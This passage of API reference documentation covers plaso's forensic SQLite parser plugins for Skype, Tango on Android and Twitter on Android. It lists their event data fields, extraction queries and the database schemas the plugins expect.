INTEGER, authorization_certificate BLOB, certificate_send_count INTEGER, account_modification_serial_nr INTEGER, saved_directory_blob BLOB, nr_of_buddies INTEGER, server_synced INTEGER, contactlist_track INTEGER, last_used_networktime INTEGER, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, node_capabilities_and INTEGER, authreq_crc INTEGER, authreq_src INTEGER, pop_score INTEGER, authreq_nodeinfo BLOB, main_phone TEXT, unified_servants TEXT, phone_home_normalized TEXT, phone_office_normalized TEXT, phone_mobile_normalized TEXT, sent_authrequest_initmethod INTEGER, authreq_initmethod INTEGER, verified_email BLOB, verified_company BLOB, sent_authrequest_extrasbitmask INTEGER, liveid_cid TEXT, extprop_seen_birthday INTEGER, extprop_sms_target INTEGER, extprop_external_data TEXT, extprop_must_hide_avatar INTEGER)', 'Conversations': 'CREATE TABLE Conversations (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, type INTEGER, live_host TEXT, live_start_timestamp INTEGER, live_is_muted INTEGER, alert_string TEXT, is_bookmarked INTEGER, given_displayname TEXT, displayname TEXT, local_livestatus INTEGER, inbox_timestamp INTEGER, inbox_message_id INTEGER, unconsumed_suppressed_messages INTEGER, unconsumed_normal_messages INTEGER, unconsumed_elevated_messages INTEGER, unconsumed_messages_voice INTEGER, active_vm_id INTEGER, context_horizon INTEGER, consumption_horizon INTEGER, last_activity_timestamp INTEGER, active_invoice_message INTEGER, spawned_from_convo_id INTEGER, pinned_order INTEGER, creator TEXT, creation_timestamp INTEGER, my_status INTEGER, opt_joining_enabled INTEGER, opt_access_token TEXT, opt_entry_level_rank INTEGER, opt_disclose_history 
INTEGER, opt_history_limit_in_days INTEGER, opt_admin_only_activities INTEGER, passwordhint TEXT, meta_name TEXT, meta_topic TEXT, meta_guidelines TEXT, meta_picture BLOB, picture TEXT, is_p2p_migrated INTEGER, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, guid TEXT, dialog_partner TEXT, meta_description TEXT, premium_video_sponsor_list TEXT, mcr_caller TEXT, chat_dbid INTEGER, history_horizon INTEGER, history_sync_state TEXT, thread_version TEXT, consumption_horizon_set_at INTEGER, alt_identity TEXT, extprop_profile_height INTEGER, extprop_chat_width INTEGER, extprop_chat_left_margin INTEGER, extprop_chat_right_margin INTEGER, extprop_entry_height INTEGER, extprop_windowpos_x INTEGER, extprop_windowpos_y INTEGER, extprop_windowpos_w INTEGER, extprop_windowpos_h INTEGER, extprop_window_maximized INTEGER, extprop_window_detached INTEGER, extprop_pinned_order INTEGER, extprop_new_in_inbox INTEGER, extprop_tab_order INTEGER, extprop_video_layout INTEGER, extprop_video_chat_height INTEGER, extprop_chat_avatar INTEGER, extprop_consumption_timestamp INTEGER, extprop_form_visible INTEGER, extprop_recovery_mode INTEGER)', 'DbMeta': 'CREATE TABLE DbMeta (key TEXT NOT NULL PRIMARY KEY, value TEXT)', 'LegacyMessages': 'CREATE TABLE LegacyMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER)', 'Messages': 'CREATE TABLE Messages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, chatname TEXT, author TEXT, from_dispname TEXT, author_was_live INTEGER, guid BLOB, dialog_partner TEXT, timestamp INTEGER, type INTEGER, sending_status INTEGER, consumption_status INTEGER, edited_by TEXT, edited_timestamp INTEGER, param_key INTEGER, param_value INTEGER, body_xml TEXT, identities TEXT, reason TEXT, leavereason INTEGER, participant_count INTEGER, error_code INTEGER, chatmsg_type INTEGER, chatmsg_status INTEGER, body_is_rawxml INTEGER, oldoptions INTEGER, newoptions INTEGER, newrole INTEGER, pk_id INTEGER, crc INTEGER, remote_id 
INTEGER, call_guid TEXT, extprop_contact_review_date TEXT, extprop_contact_received_stamp INTEGER, extprop_contact_reviewed INTEGER)', 'Participants': 'CREATE TABLE Participants (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, identity TEXT, rank INTEGER, requested_rank INTEGER, text_status INTEGER, voice_status INTEGER, video_status INTEGER, live_identity TEXT, live_price_for_me TEXT, live_fwd_identities TEXT, live_start_timestamp INTEGER, sound_level INTEGER, debuginfo TEXT, next_redial_time INTEGER, nrof_redials_left INTEGER, last_voice_error TEXT, quality_problems TEXT, live_type INTEGER, live_country TEXT, transferred_by TEXT, transferred_to TEXT, adder TEXT, last_leavereason INTEGER, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, live_identity_to_use TEXT, livesession_recovery_in_progress INTEGER, is_multiparty_video_updatable INTEGER, real_identity TEXT, extprop_default_identity INTEGER)', 'SMSes': 'CREATE TABLE SMSes (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, outgoing_reply_type INTEGER, status INTEGER, failurereason INTEGER, is_failed_unseen INTEGER, timestamp INTEGER, price INTEGER, price_precision INTEGER, price_currency TEXT, reply_to_number TEXT, target_numbers TEXT, target_statuses BLOB, body TEXT, chatmsg_id INTEGER, identity TEXT, notification_id INTEGER, event_flags INTEGER, reply_id_number TEXT, convo_name TEXT, extprop_hide_from_history INTEGER, extprop_extended INTEGER)', 'Transfers': 'CREATE TABLE Transfers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, starttime INTEGER, finishtime INTEGER, filepath TEXT, filename TEXT, filesize TEXT, bytestransferred TEXT, bytespersecond INTEGER, chatmsg_guid BLOB, chatmsg_index INTEGER, convo_id INTEGER, pk_id INTEGER, nodeid BLOB, last_activity INTEGER, flags INTEGER, old_status INTEGER, old_filepath INTEGER, accepttime INTEGER, 
parent_id INTEGER, offer_send_list TEXT, extprop_localfilename TEXT, extprop_hide_from_history INTEGER, extprop_window_visible INTEGER, extprop_handled_by_chat INTEGER)', 'VideoMessages': 'CREATE TABLE VideoMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, qik_id BLOB, attached_msg_ids TEXT, sharing_id TEXT, status INTEGER, vod_status INTEGER, vod_path TEXT, local_path TEXT, public_link TEXT, progress INTEGER, title TEXT, description TEXT, author TEXT, creation_timestamp INTEGER)', 'Videos': 'CREATE TABLE Videos (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, error TEXT, debuginfo TEXT, dimensions TEXT, media_type INTEGER, duration_1080 INTEGER, duration_720 INTEGER, duration_hqv INTEGER, duration_vgad2 INTEGER, duration_ltvgad2 INTEGER, timestamp INTEGER, hq_present INTEGER, duration_ss INTEGER, ss_timestamp INTEGER, convo_id INTEGER, device_path TEXT)', 'Voicemails': 'CREATE TABLE Voicemails (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, subject TEXT, timestamp INTEGER, duration INTEGER, allowed_duration INTEGER, playback_progress INTEGER, convo_id INTEGER, chatmsg_guid BLOB, notification_id INTEGER, flags INTEGER, size INTEGER, path TEXT, failures INTEGER, vflags INTEGER, xmsg TEXT, extprop_hide_from_history INTEGER)'}]

class plaso.parsers.sqlite_plugins.skype.SkypeSMSEventData
    Bases: plaso.containers.events.EventData
    Skype SMS event data.
        number: phone number where the SMS was sent. Type: str
        query: SQL query that was used to obtain the event data. Type: str
        text: text (SMS body) that was sent. Type: str
    DATA_TYPE = 'skype:event:sms'

class plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventData
    Bases: plaso.containers.events.EventData
    Skype file transfer event data.
        action_type: action type such as: “GETSOLICITUDE”, “SENDSOLICITUDE”, “ACCEPTED” or “FINISHED”. Type: str
        destination: account that received the file. Type: str
        offset: identifier of the row from which the event data was extracted. Type: str
        query: SQL query that was used to obtain the event data. Type: str
        source: account that sent the file. Type: str
        transferred_filename: name of the file transferred. Type: str
        transferred_filepath: path of the file transferred. Type: str
        transferred_filesize: size of the file transferred. Type: int


    DATA_TYPE = 'skype:event:transferfile'

plaso.parsers.sqlite_plugins.tango_android module

SQLite parser plugin for Tango on Android database files.

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData
    Bases: plaso.containers.events.EventData
    Tango on Android contact event data.
        first_name: contact profile first name. Type: str
        last_name: contact profile last name. Type: str
        birthday: contact profile birthday. Type: str
        gender: contact profile gender. Type: str
        status: contact status message. Type: str
        distance: contact profile distance. Type: int
        is_friend: True if the contact is considered a friend. Type: bool
        friend_request_type: flag indicating the type of friend request sent, for example outRequest for a request sent or noRequest for no request. Type: str
        friend_request_message: message sent on friend request. Type: str
    DATA_TYPE = 'tango:android:contact'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventData
    Bases: plaso.containers.events.EventData
    Tango on Android conversation event data.


        conversation_identifier: conversation identifier. Type: int
    DATA_TYPE = 'tango:android:conversation'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventData
    Bases: plaso.containers.events.EventData
    Tango on Android message event data.
        message_identifier: message identifier. Type: int
        direction: flag indicating direction of the message. Type: int
    DATA_TYPE = 'tango:android:message'

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Tango on Android profile database files.
    DATA_FORMAT = 'Tango on Android profile SQLite database file'
    NAME = 'tango_android_profile'
    ParseContactRow(parser_mediator, query, row, **unused_kwargs)
        Parses a contact row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    QUERIES = [('SELECT itemLastActiveTime AS last_active_time, itemLastLocalAccessTime AS last_access_time, itemFriendRequestTime AS friend_request_time, itemFirstName AS first_name, itemLastName AS last_name, itemBirthday AS birthday, itemGender AS gender, itemStatus AS status, itemDistance AS distance, itemIsFriend AS friend, itemFriendRequestType AS friend_request_type, itemFriendRequestMessage AS friend_request_message FROM profiletable', 'ParseContactRow')]
    REQUIRED_STRUCTURE = {'profiletable': frozenset({'itemBirthday', 'itemDistance', 'itemFirstName', 'itemFriendRequestMessage', 'itemFriendRequestTime', 'itemFriendRequestType', 'itemGender', 'itemIsFriend', 'itemLastActiveTime', 'itemLastLocalAccessTime', 'itemLastName', 'itemStatus'})}


SCHEMAS = [{'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'profiletable': 'CREATE TABLE `profiletable` (`itemUserId` TEXT PRIMARY KEY, `itemFirstName` TEXT NOT NULL, `itemLastName` TEXT NOT NULL, `itemBirthday` TEXT NOT NULL, `itemGender` TEXT NOT NULL, `itemStatus` TEXT NOT NULL, `itemLastActiveTime` BIGINT NOT NULL, `itemDistance` DOUBLE NOT NULL, `itemCity` TEXT NOT NULL, `itemGeoCountryCode` TEXT NOT NULL, `itemAvatarUrl` TEXT NOT NULL, `itemThumbnailUrl` TEXT NOT NULL, `itemVideoUrl` TEXT NOT NULL, `itemVideoThumbnailUrl` TEXT NOT NULL, `itemBackgroundUrl` TEXT NOT NULL, `itemIsFriend` INTEGER NOT NULL, `itemIsBlocked` INTEGER NOT NULL, `itemFriendRequestType` TEXT NOT NULL, `itemReverseRelationships` TEXT NOT NULL, `itemFavoriterCount` INTEGER NOT NULL, `itemFavoritingCount` INTEGER NOT NULL, `itemFeedCount` INTEGER NOT NULL, `itemRefereneCount` INTEGER NOT NULL, `itemLevel1DataSyncTime` BIGINT NOT NULL, `itemLevel2DataSyncTime` BIGINT NOT NULL, `itemLevel3DataSyncTime` BIGINT NOT NULL, `itemLevel4DataSyncTime` BIGINT NOT NULL, `itemLevel5DataSyncTime` BIGINT NOT NULL, `itemLastLocalAccessTime` BIGINT NOT NULL, `itemFriendRequestId` TEXT NOT NULL, `itemFriendRequestMessage` TEXT NOT NULL, `itemFriendRequestTime` BIGINT NOT NULL, `itemIsNewFriendRequest` INTEGER NOT NULL, `itemFriendRequestTCMessageId` INTEGER NOT NULL, `itemFriendRequestContext` TEXT NOT NULL, `itemFriendRequestAttachedPostType` INTEGER NOT NULL, `itemFriendRequestAttachedPostContent` TEXT NOT NULL, `itemFriendRequestHasBeenForwardedToTc` INTEGER NOT NULL, `itemProfileType` TEXT NOT NULL, `itemDatingAge` INTEGER NOT NULL, `itemDatingLocationString` TEXT NOT NULL, `itemDatingSeekingString` TEXT NOT NULL, `itemDatingEssayText` TEXT NOT NULL, `itemDatingBodyType` TEXT NOT NULL, `itemDatingLastActive` TEXT NOT NULL, `itemDatingProfileUrl` TEXT NOT NULL, `itemLastTimeOfLikeProfile` BIGINT NOT NULL, `itemIsHidden` INTEGER NOT NULL, `itemPrivacy` INTEGER NOT NULL, 
`itemCanSeeMyPost` INTEGER NOT NULL, `itemCanShareMyPost` INTEGER NOT NULL, `itemCanContactMe` INTEGER NOT NULL)'}]

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Tango on Android TC database files.
    DATA_FORMAT = 'Tango on Android TC SQLite database file'
    NAME = 'tango_android_tc'
    ParseConversationRow(parser_mediator, query, row, **unused_kwargs)
        Parses a conversation row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
        Parses a message row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.


    QUERIES = [('SELECT conversations.conv_id AS conv_id, conversations.payload AS payload FROM conversations', 'ParseConversationRow'), ('SELECT messages.create_time AS create_time, messages.send_time AS send_time, messages.msg_id AS msg_id, messages.payload AS payload, messages.direction AS direction FROM messages LEFT JOIN likes ON messages.msg_id = likes.msg_id', 'ParseMessageRow')]
    REQUIRED_STRUCTURE = {'conversations': frozenset({'conv_id', 'payload'}), 'likes': frozenset({'msg_id'}), 'messages': frozenset({'create_time', 'direction', 'msg_id', 'payload', 'send_time'})}
    SCHEMAS = [{'conversations': 'CREATE TABLE `conversations` (`conv_id` TEXT PRIMARY KEY, `conv_type` INTEGER DEFAULT 0, `payload` BLOB, `last_msg_id` INTEGER, `unread_count` INTEGER, `last_read_sent_msg_id` INTEGER, `conv_del_status` INTEGER DEFAULT 0, `deleting_ts` BIGINT DEFAULT 0, `conv_restore_status` INTEGER DEFAULT 0, `peers_read` TEXT, `total_received_msg_count` INTEGER DEFAULT -1, `communication_context` INTEGER DEFAULT 0)', 'games': 'CREATE TABLE `games` (`game_session_id` TEXT PRIMARY KEY, `message_id` INTEGER, `conversation_id` TEXT, `game_id` TEXT, `game_state` INTEGER, `action_timestamp` BIGINT, `current_player_account_id` TEXT)', 'likes': 'CREATE TABLE `likes` (`msg_id` INTEGER PRIMARY KEY, `global_msg_id` TEXT, `conv_id` TEXT, `liker_aid` TEXT, `act_type` INTEGER, `status` INTEGER, `act_ts` BIGINT, `payload` BLOB)', 'messages': 'CREATE TABLE `messages` (`msg_id` INTEGER PRIMARY KEY, `conv_id` TEXT, `type` INTEGER, `media_id` TEXT, `share_id` TEXT, `create_time` BIGINT, `send_time` BIGINT, `direction` INTEGER, `status` INTEGER, `payload` BLOB, `del_status` INTEGER)', 'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'receipts': 'CREATE TABLE `receipts` (`conv_id` TEXT PRIMARY KEY, `msg_id` INTEGER, `sender_msg_id` INTEGER, `sender_aids` TEXT, `type` INTEGER, `create_time` BIGINT, `status` INTEGER, `payload` BLOB)', 'sms': 'CREATE TABLE `sms` (`msg_id` 
INTEGER PRIMARY KEY, `phonenumber` TEXT, `text` TEXT)'}]

plaso.parsers.sqlite_plugins.twitter_android module

SQLite parser plugin for Twitter on Android database files.

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventData
    Bases: plaso.containers.events.EventData
    Twitter on Android contact event data.
        description: twitter account profile description. Type: str
        followers: number of followers. Type: int
        friends: number of following. Type: int
        identifier: contact row id. Type: int


        image_url: profile picture url. Type: str
        location: twitter account profile location content. Type: str
        name: twitter account name. Type: str
        query: SQL query that was used to obtain the event data. Type: str
        statuses: twitter account number of tweets. Type: int
        user_identifier: twitter account id. Type: int
        username: twitter account handler. Type: str
        web_url: twitter account profile url content. Type: str
    DATA_TYPE = 'twitter:android:contact'

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Twitter on Android database files.
    DATA_FORMAT = 'Twitter on Android SQLite database file'
    NAME = 'twitter_android'
    ParseContactRow(parser_mediator, query, row, **unused_kwargs)
        Parses a contact row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    ParseSearchRow(parser_mediator, query, row, **unused_kwargs)
        Parses a search row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    ParseStatusRow(parser_mediator, query, row, **unused_kwargs)
        Parses a status row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    QUERIES = [('SELECT name, query, time FROM search_queries', 'ParseSearchRow'), ('SELECT statuses._id AS _id, statuses.author_id AS author_id, users.username AS username, statuses.content AS content, statuses.created AS time, statuses.favorited AS favorited, statuses.retweeted AS retweeted FROM statuses LEFT JOIN users ON statuses.author_id = users.user_id', 'ParseStatusRow'), ('SELECT _id, user_id, username, name, profile_created, description, web_url, location, followers, friends, statuses, image_url, updated, friendship_time FROM users', 'ParseContactRow')]
    REQUIRED_STRUCTURE = {'search_queries': frozenset({'name', 'query', 'time'}), 'statuses': frozenset({'_id', 'author_id', 'content', 'created', 'favorited', 'retweeted'}), 'users': frozenset({'_id', 'description', 'followers', 'friends', 'friendship_time', 'image_url', 'location', 'name', 'profile_created', 'statuses', 'updated', 'user_id', 'username', 'web_url'})}


SCHEMAS = [{'activities': 'CREATE TABLE activities (_id INTEGER PRIMARY KEY,type INT,event INT,created_at INT,hash INT,max_position INT,min_position INT,sources_size INT,source_type INT,sources BLOB,targets_size INT,target_type INT,targets BLOB,target_objects_size INT,target_object_type INT,target_objects BLOB,is_last INT,tag INT,magic_rec_id INT,UNIQUE (type, max_position) ON CONFLICT REPLACE)', 'ads_account_permissions': 'CREATE TABLE ads_account_permissions (_id INTEGER PRIMARY KEY,promotable_users BLOB,last_synced INT NOT NULL)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'business_profiles': 'CREATE TABLE business_profiles (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,business_profile BLOB,last_synced INT NOT NULL)', 'card_state': 'CREATE TABLE card_state (_id INTEGER PRIMARY KEY AUTOINCREMENT,card_status_id INT,card_id INT, card_state BLOB)', 'category_timestamp': 'CREATE TABLE category_timestamp (_id INTEGER PRIMARY KEY,cat_status_id INT NOT NULL,cat_tag INT NOT NULL,cat_timestamp INT NOT NULL)', 'clusters': 'CREATE TABLE clusters (_id INTEGER PRIMARY KEY,cl_cluster_id TEXT UNIQUE NOT NULL,cl_type INT,cl_title TEXT,cl_subtitle TEXT,cl_size INT,cl_timestamp INT,cl_content BLOB)', 'conversation_entries': 'CREATE TABLE conversation_entries (_id INTEGER PRIMARY KEY,entry_id INT UNIQUE NOT NULL,sort_entry_id INT UNIQUE NOT NULL,conversation_id TEXT,user_id INT,created INT,entry_type INT,data BLOB,request_id TEXT)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY,conversation_id TEXT NOT NULL,user_id TEXT NOT NULL,join_time INT NOT NULL,participant_type INT NOT NULL)', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY,conversation_id TEXT UNIQUE NOT NULL,title TEXT,avatar_url TEXT,type INT,sort_event_id BIGINT,last_readable_event_id BIGINT,last_read_event_id BIGINT,sort_timestamp BIGINT,is_muted INT,min_event_id BIGINT,is_hidden INT,has_more INT,read_only INT)', 
'cursors': 'CREATE TABLE cursors (_id INTEGER PRIMARY KEY,kind INT,type INT,owner_id INT,ref_id TEXT,next TEXT)', 'dismiss_info': 'CREATE TABLE dismiss_info(timeline_id INTEGER REFERENCES timeline(_id),feedback_action_id INTEGER REFERENCES feedback_action(_id),UNIQUE(timeline_id,feedback_action_id))', 'feedback_action': 'CREATE TABLE feedback_action(_id INTEGER PRIMARY KEY AUTOINCREMENT,feedback_type TEXT,prompt TEXT,confirmation TEXT,UNIQUE(feedback_type,prompt,confirmation))', 'list_mapping': 'CREATE TABLE list_mapping (_id INTEGER PRIMARY KEY,list_mapping_list_id TEXT,list_mapping_type INT,list_mapping_user_id INT,list_is_last INT)', 'locations': 'CREATE TABLE locations (_id INTEGER PRIMARY KEY,name TEXT,woeid INT,country TEXT,country_code TEXT)', 'moments': 'CREATE TABLE moments (_id INTEGER PRIMARY KEY,title TEXT NOT NULL,can_subscribe INT,is_live INT,is_sensitive INT,subcategory_string TEXT,subcategory_favicon_url TEXT,time_string TEXT,duration_string TEXT,is_subscribed INT,description TEXT NOT NULL,moment_url TEXT,num_subscribers INT,author_info BLOB,promoted_content BLOB)', 'moments_guide': 'CREATE TABLE moments_guide (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,section_id INT NOT NULL,tweet_id INT NOT NULL, crop_data BLOB,media_id INT,media_url TEXT,media_size BLOB,FOREIGN KEY(section_id) REFERENCES moments_sections(_id) ON DELETE CASCADE)', 'moments_guide_categories': 'CREATE TABLE moments_guide_categories (_id INTEGER PRIMARY KEY,category_id TEXT NOT NULL,is_default_category INT NOT NULL,category_name TEXT NOT NULL,fetch_timestamp INT NOT NULL)', 'moments_guide_user_states': 'CREATE TABLE moments_guide_user_states (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,is_read INT,is_updated INT,FOREIGN KEY(moment_id) REFERENCES moments(_id) ON DELETE CASCADE)', 'moments_pages': 'CREATE TABLE moments_pages (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,page_id TEXT,type BLOB,tweet_id INT,display_mode BLOB,page_number INT,crop_data BLOB,theme_data 
BLOB,media_id INT,media_size BLOB,media_url TEXT,last_read_timestamp INT,FOREIGN KEY(moment_id) REFERENCES moments(_id))', 'moments_sections': 'CREATE TABLE moments_sections (_id INTEGER PRIMARY KEY,section_title TEXT,section_type BLOB NOT NULL,section_group_id TEXT,section_group_type INT NOT NULL)', 'moments_visit_badge': 'CREATE TABLE moments_visit_badge (_id INTEGER PRIMARY KEY,moment_id INT UNIQUE NOT NULL,is_new_since_visit INT,is_updated_since_visit INT)', 'news': 'CREATE TABLE news (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,topic_id INT,news_id TEXT,title TEXT,image_url TEXT,author_name TEXT,article_description TEXT,article_url TEXT,tweet_count INT,start_time INT,news_id_hash INT)', 'notifications': 'CREATE TABLE notifications (_id INTEGER PRIMARY KEY,type INT,notif_id INT,source_user_name TEXT,s_name TEXT,s_id INT,notif_txt TEXT,aggregation_data TEXT,notif_extra_data BLOB)', 'one_click': 'CREATE TABLE one_click (_id INTEGER PRIMARY KEY,topic TEXT,filter_name TEXT,filter_location TEXT,filter_follow INT)', 'order_history': 'CREATE TABLE order_history (_id INTEGER PRIMARY KEY,ordered_at INT ,order_id INT ,data BLOB)', 'promoted_retry': 'CREATE TABLE promoted_retry(impression_id TEXT,event INT NOT NULL,is_earned INT NOT NULL,trend_id INT,num_retries INT NOT NULL,url TEXT,video_playlist_url TEXT,video_content_uuid TEXT,video_content_type TEXT,video_cta_url TEXT,video_cta_app_id TEXT,video_cta_app_name TEXT,card_event TEXT,PRIMARY KEY(impression_id,event,is_earned,trend_id))', 'prompts': 'CREATE TABLE prompts (_id INTEGER PRIMARY KEY,p_id INT,p_format TEXT,p_template TEXT,p_header TEXT,p_text TEXT,p_action_text TEXT,p_action_url TEXT,p_icon TEXT,p_background_image_url TEXT,p_persistence TEXT,p_entities BLOB,p_header_entities BLOB,p_status_id LONG,p_insertion_index INT,p_trigger TEXT)', 'rankings': 'CREATE TABLE rankings (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,granularity TEXT,category 
TEXT,date INT)', 'search_queries': 'CREATE TABLE search_queries (_id INTEGER PRIMARY KEY,type INT,name TEXT NOT NULL,query TEXT NOT NULL,query_id INT,time INT,latitude REAL,longitude REAL,radius REAL,location TEXT,pc BLOB,cluster_titles BLOB)', 'search_results': 'CREATE TABLE search_results (_id INTEGER PRIMARY KEY,search_id INT,s_type INT,data_type INT,type_id INT,polled INT,data_id INT,related_data BLOB,cluster_id INT)', 'search_suggestion_metadata': 'CREATE TABLE search_suggestion_metadata (_id INTEGER PRIMARY KEY,type INT,last_update LONG)', 'status_groups': 'CREATE TABLE status_groups (_id INTEGER PRIMARY KEY,tweet_type INT DEFAULT 0,type INT,sender_id INT,owner_id INT,ref_id INT,tag INT,g_status_id INT,is_read INT,page INT,is_last INT,updated_at INT,timeline INT,pc BLOB,g_flags INT,preview_draft_id INT,preview_media BLOB,tweet_pivots BLOB)', 'status_metadata': 'CREATE TABLE status_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,status_id INT NOT NULL,status_group INT NOT NULL,status_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_second_name TEXT,soc_others_count INT,soc_fav_count INT,soc_rt_count INT,reason_icon_type TEXT,reason_text TEXT,scribe_component TEXT,scribe_data BLOB,highlights TEXT)', 'statuses': 'CREATE TABLE statuses (_id INTEGER PRIMARY KEY,status_id INT UNIQUE NOT NULL,author_id INT,content TEXT,source TEXT,created INT,in_r_user_id INT,in_r_status_id INT,favorited INT,latitude TEXT,longitude TEXT,place_data BLOB,entities TEXT,retweet_count INT,r_content TEXT,cards BLOB,flags INT,favorite_count INT,lang TEXT,supplemental_language TEXT,view_count INT,quoted_tweet_data BLOB,quoted_tweet_id INT,retweeted INT)', 'stories': 'CREATE TABLE stories ( _id INTEGER PRIMARY KEY,story_id TEXT,story_order INT,story_type INT,story_proof_type INT,story_proof_addl_count INT,data_type INT,data_id INT,story_is_read INT,story_meta_title TEXT,story_meta_subtitle TEXT,story_meta_query TEXT,story_meta_header_img_url TEXT,story_source 
TEXT,story_impression_info TEXT,story_tag INT)', 'timeline': 'CREATE TABLE timeline (_id INTEGER PRIMARY KEY AUTOINCREMENT,owner_id INT,type INT,sort_index INT,entity_id INT,entity_type INT,data_type INT,data_type_group INT,data_type_tag INT,timeline_tag TEXT,timeline_group_id INT,timeline_scribe_group_id INT,data_id INT,data BLOB,flags INT,updated_at INT,data_origin_id TEXT,is_last INT,is_read INT,scribe_content BLOB,timeline_moment_info BLOB,dismissed INT NOT NULL DEFAULT 0,dismiss_actions INT NOT NULL DEFAULT 0)', 'tokens': 'CREATE TABLE tokens (_id INTEGER PRIMARY KEY,text TEXT,weight INT,type INT,ref_id INT)', 'topics': 'CREATE TABLE topics (_id INTEGER PRIMARY KEY,ev_id TEXT UNIQUE NOT NULL,ev_type INT,ev_query TEXT NOT NULL,ev_seed_hashtag TEXT,ev_title STRING,ev_subtitle STRING,ev_view_url STRING,ev_status STRING,ev_image_url TEXT,ev_explanation TEXT,ev_tweet_count INT,ev_start_time INT,ev_owner_id INT,ev_pc BLOB,ev_content BLOB,ev_hash INT)', 'user_groups': 'CREATE TABLE user_groups (_id INTEGER PRIMARY KEY,type INT,tag INT,rank INT,owner_id INT,user_id INT,is_last INT,pc BLOB,g_flags INT)', 'user_metadata': 'CREATE TABLE user_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,user_id INT NOT NULL,user_group_type INT NOT NULL,user_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_follow_count INT,user_title TEXT,token TEXT)', 'users': 'CREATE TABLE users (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,username TEXT,name TEXT,description TEXT,web_url TEXT,bg_color INT,location TEXT,structured_location BLOB,user_flags INT,followers INT,fast_followers INT DEFAULT 0,friends INT,statuses INT,profile_created INT,image_url TEXT,hash INT,updated INT,friendship INT,friendship_time INT,favorites INT DEFAULT 0,header_url TEXT,description_entities BLOB,url_entities BLOB,media_count INT,extended_profile_fields BLOB,pinned_tweet_id INT,link_color INT,advertiser_type TEXT,business_profile_state TEXT)'}]

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventData
    Bases: plaso.containers.events.EventData
    Twitter on Android search event data.
        name: twitter name handler. Type: str
        query: SQL query that was used to obtain the event data. Type: str
        search_query: search query. Type: str
    DATA_TYPE = 'twitter:android:search'

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData
    Bases: plaso.containers.events.EventData
    Twitter on Android status event data.
        author_identifier: twitter account identifier. Type: int
        content: status content. Type: str
        favorited: favorited flag as 0/1 value. Type: int
        identifier: status row identifier. Type: int
        query: SQL query that was used to obtain the event data. Type: str
        retweeted: retweeted flag as 0/1 value. Type: int
